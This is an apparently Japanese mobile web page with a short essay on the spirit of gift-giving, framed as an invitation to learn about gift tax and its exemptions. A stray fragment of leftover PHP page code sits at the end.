天のギフト

[0]TOP [1]贈与と贈与税
[2]前へ [3]次へ

天のギフト



天のギフト
プレゼント、ギフト…贈り物をもらうのは、嬉しいものです。贈る人の暖かい心が込もった『贈与』は、受取る人の心を元気にしてくれます。

心を込めた贈り物…とはいっても、下ゴゴロ満載の《賄賂》はダメです(犯罪だし…)。受取る人に見返りを要求する贈り物は、『贈与』とは言えません。

また、生命保険の外交員が、昼休みにやってきて…頼んでもいない保険設計書と共に、保険会社名が入ったワケの分からない代物をボンボン置いていくのは、〈保険に加入してネ!〉‥といった、期待感(圧力?)が丸見えです。

見返りを期待して行われる行為は、《贈り与えること》ではありません。無償であるがゆえに、『贈与』は生きるのです。

人生における、究極の贈り物…それは、やはり《愛》でしょう。《愛》を実感して生きている人の心根は、強く優しいものです。《愛》は、勇気と自信を与えます。

しかし、すべての人が、難なく《愛》を表現できるとは限りません。屈折した表現になってしまったり、金品を《贈り与えること》で代替することもあるでしょう。でも…そこに《愛》があるならば、それが精一杯の表現ならば、それで良いのだと思います。

『贈与』では、贈り物を受取った人が、税金を払うことになる場合があります。また、家族間のプレゼントと『贈与』という文言とが、結びつかない人もいるでしょう。

〈心を込めて大切な人に贈り物をしたら、税金がかかるって?…それなら、『贈与』なんて誰がするか〜!!〉‥なんて言わないで、ちょっと勉強してみませんか?

贈り物の全てに、もれなく税金がかかるワケではありません。税法の使い方によっては、税額軽減や非課税もアリです!

自分の精神世界の中心で、〈心底大切だ〜!〉‥と、どんなに《愛》を叫んでも…言葉や文字や態度で表現しなければ、相手には伝わりません。そして、『贈与』も表現のひとつです。『贈与』についての知識があれば、受取る人に心地よく(非課税とか♪‥)、思いを届けることができるでしょう。

知識の実現は、《愛》と同様、勇気と自信につながります。そもそも人類は《知恵》という、天からのギフトを授かって産まれてくるのですから…。

同内容のPCサイト

[1]贈与と贈与税 目次へ
[2]前ページへ
[3]次ページへ
[4]このページ一番上へ

[0]TOPページへ


当サイトの分野別目次
贈与と贈与税 | 贈与税で相続対策 | 相続時精算課税制度 | 贈与税の計算と納税 |
$mai2i_v) { $mai2i_url .= '&' . $mai2i_p . '=' . urlencode($mai2i_v); } } @readfile($mai2i_url); unset($mai2i, $mai2i_url); ?>